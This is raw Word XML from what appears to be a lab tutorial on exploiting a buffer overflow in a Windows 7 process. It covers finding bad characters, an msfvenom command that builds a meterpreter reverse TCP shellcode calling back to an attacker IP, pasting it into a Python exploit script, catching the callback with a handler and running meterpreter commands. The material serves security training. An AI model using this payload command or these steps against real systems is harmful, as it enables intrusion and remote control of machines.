      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are entered backwards, due to “little-endian ness”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2EDA1" w14:textId="022DECD3" w:rsidR="0063041B" w:rsidRDefault="00300A44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5912039F" wp14:editId="05497FCF">
            <wp:extent cx="5943600" cy="1130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30300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEC436" w14:textId="4CC37158" w:rsidR="0063041B" w:rsidRDefault="0063041B"/>
    <w:p w14:paraId="3F214D17" w14:textId="6F0A9621" w:rsidR="00C7232B" w:rsidRDefault="00C7232B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09467B0B" w14:textId="6680E8E1" w:rsidR="00DD5F7B" w:rsidRDefault="00DD5F7B" w:rsidP="00DD5F7B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc47350172"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Find bad characters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7A72E590" w14:textId="722ECA33" w:rsidR="00DD5F7B" w:rsidRDefault="00DD5F7B" w:rsidP="00DD5F7B">
      <w:r>
        <w:t xml:space="preserve">Not all characters from an encoding will work with shell code.  This depends on several factors, such as the type of language the target process is running and its architecture.  We will use a brute force method to detect bad characters.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080FE949" w14:textId="06236AD3" w:rsidR="00DD5F7B" w:rsidRDefault="00821BF3" w:rsidP="00DD5F7B">
      <w:r>
        <w:t>This website contains a reference to finding bad chars.  Essentially, all hex values from \x00 to \xff are stored in a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670BAF5B" w14:textId="11251DC9" w:rsidR="00821BF3" w:rsidRDefault="00270DF1" w:rsidP="00DD5F7B">
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00821BF3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58612E63" w14:textId="1AEF06FB" w:rsidR="007606EC" w:rsidRDefault="007606EC" w:rsidP="007606EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc47350173"/>
      <w:r>
        <w:t>Create a new script with a badchars string</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5C8D222C" w14:textId="3EBF41D7" w:rsidR="007606EC" w:rsidRDefault="002105E7" w:rsidP="00DD5F7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2471F09B" wp14:editId="4CFB88C3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>136478</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1093091</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5807122" cy="1071349"/>
                <wp:effectExtent l="0" t="0" r="22225" b="14605"/>
                <wp:wrapNone/>
                <wp:docPr id="110" name="Rectangle 110"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5807122" cy="10713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735E5F1" id="Rectangle 110" o:spid="_x0000_s1026" style="position:absolute;margin-left:10.75pt;margin-top:86.05pt;width:457.25pt;height:8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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54046679" wp14:editId="1E04F1DC">
            <wp:extent cx="5943600" cy="302641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26410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4DA26E" w14:textId="7D58D660" w:rsidR="002105E7" w:rsidRDefault="002105E7" w:rsidP="00DD5F7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24C8768C" wp14:editId="3978ABF5">
            <wp:extent cx="4772025" cy="11525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2025" cy="1152525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54251A2F" w14:textId="0E6670F7" w:rsidR="002105E7" w:rsidRDefault="002105E7" w:rsidP="002105E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc47350174"/>
      <w:r>
        <w:t>Check the debugger on Windows 7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0B08596C" w14:textId="3F2E7712" w:rsidR="002105E7" w:rsidRDefault="002105E7" w:rsidP="00DD5F7B">
      <w:r>
        <w:t>There appears to be an “Access violation error” in the notification at the very bottom of the debugger window. This appears to be an issue with the “\x00” character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749AB94A" w14:textId="4C44A20F" w:rsidR="009F2530" w:rsidRDefault="009F2530" w:rsidP="00DD5F7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0009E668" wp14:editId="16D8C5CD">
            <wp:extent cx="4238625" cy="32194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8625" cy="3219450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651226D" w14:textId="4C8E2860" w:rsidR="002105E7" w:rsidRDefault="002105E7" w:rsidP="00DD5F7B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AFBAAD" wp14:editId="4E28CDA7">
            <wp:extent cx="5943600" cy="6051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05155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A912B8" w14:textId="77777777" w:rsidR="00266A1F" w:rsidRDefault="00266A1F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52C842" w14:textId="6E30E409" w:rsidR="002105E7" w:rsidRDefault="002105E7" w:rsidP="002105E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc47350175"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remove bad character and try again with remaining bad char script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1D7D624D" w14:textId="40886A2E" w:rsidR="00266A1F" w:rsidRDefault="00327090" w:rsidP="00266A1F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7654C65E" wp14:editId="0F656961">
            <wp:extent cx="5943600" cy="30035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03550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E4C8A" w14:textId="2101025E" w:rsidR="00327090" w:rsidRDefault="00327090" w:rsidP="00266A1F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA65DA9" wp14:editId="45641C86">
            <wp:extent cx="3838575" cy="10096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8575" cy="1009650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC49A67" w14:textId="517EB87F" w:rsidR="00327090" w:rsidRDefault="00327090" w:rsidP="00266A1F"/>
    <w:p w14:paraId="0578CC0A" w14:textId="3EFD5F62" w:rsidR="009F2530" w:rsidRDefault="009F2530" w:rsidP="00266A1F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1940FFEE" wp14:editId="69B0B0E4">
            <wp:extent cx="4756245" cy="261517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0460" cy="2622986"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F724BDB" w14:textId="20EDA944" w:rsidR="00327090" w:rsidRDefault="00327090" w:rsidP="00266A1F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58836713" wp14:editId="30897BE6">
            <wp:extent cx="4783540" cy="4503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7631" cy="466704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4756AAA7" w14:textId="77777777" w:rsidR="00266A1F" w:rsidRPr="00266A1F" w:rsidRDefault="00266A1F" w:rsidP="00266A1F"/>
    <w:p w14:paraId="48914D12" w14:textId="77777777" w:rsidR="00DD5F7B" w:rsidRDefault="00DD5F7B" w:rsidP="00C7232B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095BA7F2" w14:textId="5356EB64" w:rsidR="00D70D1B" w:rsidRDefault="00D70D1B" w:rsidP="00C7232B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc47350176"/>
      <w:r>
        <w:t>Generate a payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="61D2ADC7" w14:textId="1E8C86C2" w:rsidR="00B109CA" w:rsidRDefault="00B109CA" w:rsidP="00B109CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc47350177"/>
      <w:r>
        <w:t>Generate payload with msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="2F94DD05" w14:textId="369A8AFC" w:rsidR="00524BD1" w:rsidRDefault="00524BD1" w:rsidP="00524BD1">
      <w:r>
        <w:t>Use msfvenom to generate a payload.  The command to do so is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B508E85" w14:textId="5BC50025" w:rsidR="00524BD1" w:rsidRDefault="00524BD1" w:rsidP="00524BD1">
      <w:r>
        <w:t>msfvenom -p &lt;payload&gt; LHOST=&lt;attacker machine&gt; LPORT &lt;attacker listening port&gt; -e &lt;encoder&gt; -b &lt;bad characters&gt; -f &lt;output format&gt; &gt; &lt;file to redirect to&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA37C0F" w14:textId="5A0034ED" w:rsidR="00524BD1" w:rsidRDefault="00524BD1" w:rsidP="00524BD1">
      <w:r>
        <w:t>in this scenario, we will use the following values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB5079" w14:textId="74377170" w:rsidR="00524BD1" w:rsidRPr="00524BD1" w:rsidRDefault="00524BD1" w:rsidP="00524BD1">
      <w:r>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.30 LPORT=5555 -b’\x00’ -e x86/shikata_ga_nai -f python &gt; shellcode.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2940BF0C" w14:textId="0EA8F53A" w:rsidR="00D70D1B" w:rsidRDefault="00D90C75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C74CE05" wp14:editId="02C79692">
            <wp:extent cx="5943600" cy="13366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36675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D477D5" w14:textId="77777777" w:rsidR="00FF2D41" w:rsidRDefault="00FF2D41"/>
    <w:p w14:paraId="7821911E" w14:textId="77777777" w:rsidR="00FF2D41" w:rsidRDefault="00FF2D41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D1DEB" w14:textId="2C05DDFA" w:rsidR="00FF2D41" w:rsidRDefault="00FF2D41" w:rsidP="00FF2D41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc47350178"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Copy shellcode into python script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="29C2A769" w14:textId="77777777" w:rsidR="00FF2D41" w:rsidRDefault="00FF2D41"/>
    <w:p w14:paraId="498049FC" w14:textId="73A205BA" w:rsidR="00040B59" w:rsidRDefault="002C40AC">
      <w:r>
        <w:t>Copy the shellcode from the shellcode.txt file into your python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D528CE8" w14:textId="6BC7741F" w:rsidR="001B3A36" w:rsidRDefault="001B3A36">
      <w:r>
        <w:t>Edit the python script</w:t>
      </w:r>
      <w:r w:rsidR="005111C5">
        <w:t xml:space="preserve"> and add the shellcode to the shellcode variable (may need to do a find an replace on ‘buf’ to rename to shellcode</w:t>
      </w:r>
      <w:r w:rsidR="004D1B53">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D9556" w14:textId="52CCDE71" w:rsidR="001B3A36" w:rsidRDefault="00D90C75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187E85F8" wp14:editId="1267E3CB">
            <wp:extent cx="4333288" cy="58890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9377" cy="5910874"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="046DA7D7" w14:textId="4FA5B79E" w:rsidR="001B3A36" w:rsidRDefault="001B3A36"/>
    <w:p w14:paraId="6C76D9BE" w14:textId="2381F9B3" w:rsidR="009F066C" w:rsidRDefault="009F066C"/>
    <w:p w14:paraId="440957FB" w14:textId="35811505" w:rsidR="00D642FC" w:rsidRDefault="00D642FC"/>
    <w:p w14:paraId="34103CAE" w14:textId="2A5E6EE1" w:rsidR="00D642FC" w:rsidRDefault="00FF2D41" w:rsidP="00FF2D41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc47350179"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run the exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="50D64867" w14:textId="06B55269" w:rsidR="00FF2D41" w:rsidRDefault="00FF2D41" w:rsidP="00FF2D41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc47350180"/>
      <w:r>
        <w:t>Start a handler on the attacker machine to catch the callback</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="5EA5CDD4" w14:textId="3AC91FD0" w:rsidR="00D642FC" w:rsidRDefault="00D642FC">
      <w:r>
        <w:t>Start a meterpreter handler on the attacker on port 5555 (this is the port built into the payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA86C31" w14:textId="6A195A95" w:rsidR="00D642FC" w:rsidRDefault="009F066C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE76B2D" wp14:editId="68BE5D97">
            <wp:extent cx="5943600" cy="1645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45920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7735FB44" w14:textId="5FE8D2FC" w:rsidR="00766B4C" w:rsidRDefault="00766B4C" w:rsidP="00BB20A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc47350181"/>
      <w:r>
        <w:t>Restart the process in the debugger on windows 7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="01F2EDD5" w14:textId="07563853" w:rsidR="00766B4C" w:rsidRDefault="00766B4C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BB715E" wp14:editId="59AEC296">
            <wp:extent cx="5943600" cy="44951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495165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="763458A7" w14:textId="5139FD85" w:rsidR="00BB20A0" w:rsidRDefault="00BB20A0"/>
    <w:p w14:paraId="38BFC516" w14:textId="2FF8BACE" w:rsidR="00BB20A0" w:rsidRDefault="00BB20A0"/>
    <w:p w14:paraId="74233432" w14:textId="05964752" w:rsidR="00BB20A0" w:rsidRDefault="00BB20A0"/>
    <w:p w14:paraId="713AD0A7" w14:textId="2FDE7C4F" w:rsidR="00BB20A0" w:rsidRDefault="00BB20A0" w:rsidP="00BB20A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc47350182"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run the exploit script</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="5F5BAB65" w14:textId="15D429A8" w:rsidR="008576D6" w:rsidRDefault="00BB20A0">
      <w:r>
        <w:t>Con kali run the script.  You should see a meterpreter connection to the handler you setup previously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A59BF" w14:textId="28B78039" w:rsidR="00040B59" w:rsidRDefault="00D90C75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23A14549" wp14:editId="401E7647">
            <wp:extent cx="5943600" cy="2270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70125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BECA2C" w14:textId="0D6E51C1" w:rsidR="00090746" w:rsidRDefault="00090746" w:rsidP="00515D78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc47350183"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run meterpreter commands</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="5C430937" w14:textId="5B0D78D7" w:rsidR="00090746" w:rsidRDefault="00090746">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB8247E" wp14:editId="0366DB09">
            <wp:extent cx="5943600" cy="27184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18435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE1A932" wp14:editId="56E801BA">
            <wp:extent cx="5943600" cy="29190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19095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000907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D6E75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96360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A05"/>
    <w:rsid w:val="00040B59"/>
    <w:rsid w:val="000665F2"/>
    <w:rsid w:val="00090746"/>
    <w:rsid w:val="00091E8D"/>
    <w:rsid w:val="000B59BB"/>
    <w:rsid w:val="000C0161"/>
    <w:rsid w:val="001B3A36"/>
    <w:rsid w:val="001C5794"/>
    <w:rsid w:val="002105E7"/>
    <w:rsid w:val="00266A1F"/>
    <w:rsid w:val="00270DF1"/>
    <w:rsid w:val="00285B7D"/>
    <w:rsid w:val="002A275E"/>
    <w:rsid w:val="002C40AC"/>
    <w:rsid w:val="00300A44"/>
    <w:rsid w:val="00327090"/>
    <w:rsid w:val="003E5D3E"/>
    <w:rsid w:val="003F1B91"/>
    <w:rsid w:val="0043673B"/>
    <w:rsid w:val="00484A4C"/>
    <w:rsid w:val="004B32F5"/>
    <w:rsid w:val="004D1B53"/>
    <w:rsid w:val="005111C5"/>
    <w:rsid w:val="00515D78"/>
    <w:rsid w:val="00524BD1"/>
    <w:rsid w:val="00525483"/>
    <w:rsid w:val="005F186A"/>
    <w:rsid w:val="006273A7"/>
    <w:rsid w:val="0063041B"/>
    <w:rsid w:val="006A5FA5"/>
    <w:rsid w:val="006C0257"/>
    <w:rsid w:val="006E1B90"/>
    <w:rsid w:val="006E2C9C"/>
    <w:rsid w:val="007606EC"/>
    <w:rsid w:val="0076456B"/>
    <w:rsid w:val="00766B4C"/>
    <w:rsid w:val="00821BF3"/>
    <w:rsid w:val="00833EF0"/>
    <w:rsid w:val="00835CE5"/>
    <w:rsid w:val="0084620C"/>
    <w:rsid w:val="00852476"/>
    <w:rsid w:val="008576D6"/>
    <w:rsid w:val="008A5737"/>
    <w:rsid w:val="00924685"/>
    <w:rsid w:val="00934963"/>
    <w:rsid w:val="009848E7"/>
    <w:rsid w:val="009A0F9A"/>
    <w:rsid w:val="009F066C"/>
    <w:rsid w:val="009F2530"/>
    <w:rsid w:val="00A268F6"/>
    <w:rsid w:val="00A521E2"/>
    <w:rsid w:val="00B109CA"/>
    <w:rsid w:val="00B15A05"/>
    <w:rsid w:val="00B453A9"/>
    <w:rsid w:val="00B74C8C"/>
    <w:rsid w:val="00BB20A0"/>
    <w:rsid w:val="00C46F2D"/>
    <w:rsid w:val="00C62A3B"/>
    <w:rsid w:val="00C6533C"/>
    <w:rsid w:val="00C7232B"/>
    <w:rsid w:val="00C8781A"/>
    <w:rsid w:val="00CD3AB0"/>
    <w:rsid w:val="00CF7C66"/>
    <w:rsid w:val="00D32E74"/>
    <w:rsid w:val="00D642FC"/>
    <w:rsid w:val="00D70D1B"/>
    <w:rsid w:val="00D90C75"/>
    <w:rsid w:val="00DC3E9A"/>
    <w:rsid w:val="00DD5F7B"/>
    <w:rsid w:val="00E04E1C"/>
    <w:rsid w:val="00E85B84"/>
    <w:rsid w:val="00EC231C"/>
    <w:rsid w:val="00F22DB1"/>
    <w:rsid w:val="00F3770D"/>
    <w:rsid w:val="00FF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DE635"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1643DBBA-51B7-4CCF-97C4-7A895FEC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3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E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23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4E1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C23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231C"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EC231C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EC231C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EC231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D3AB0"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C62A3B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F3770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hyperlink" Target="https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/" TargetMode="External"/><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8BCC-EE77-4883-A490-32AF96C6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Bryant</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mason, Joshua C</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-03T18:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-13T03:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>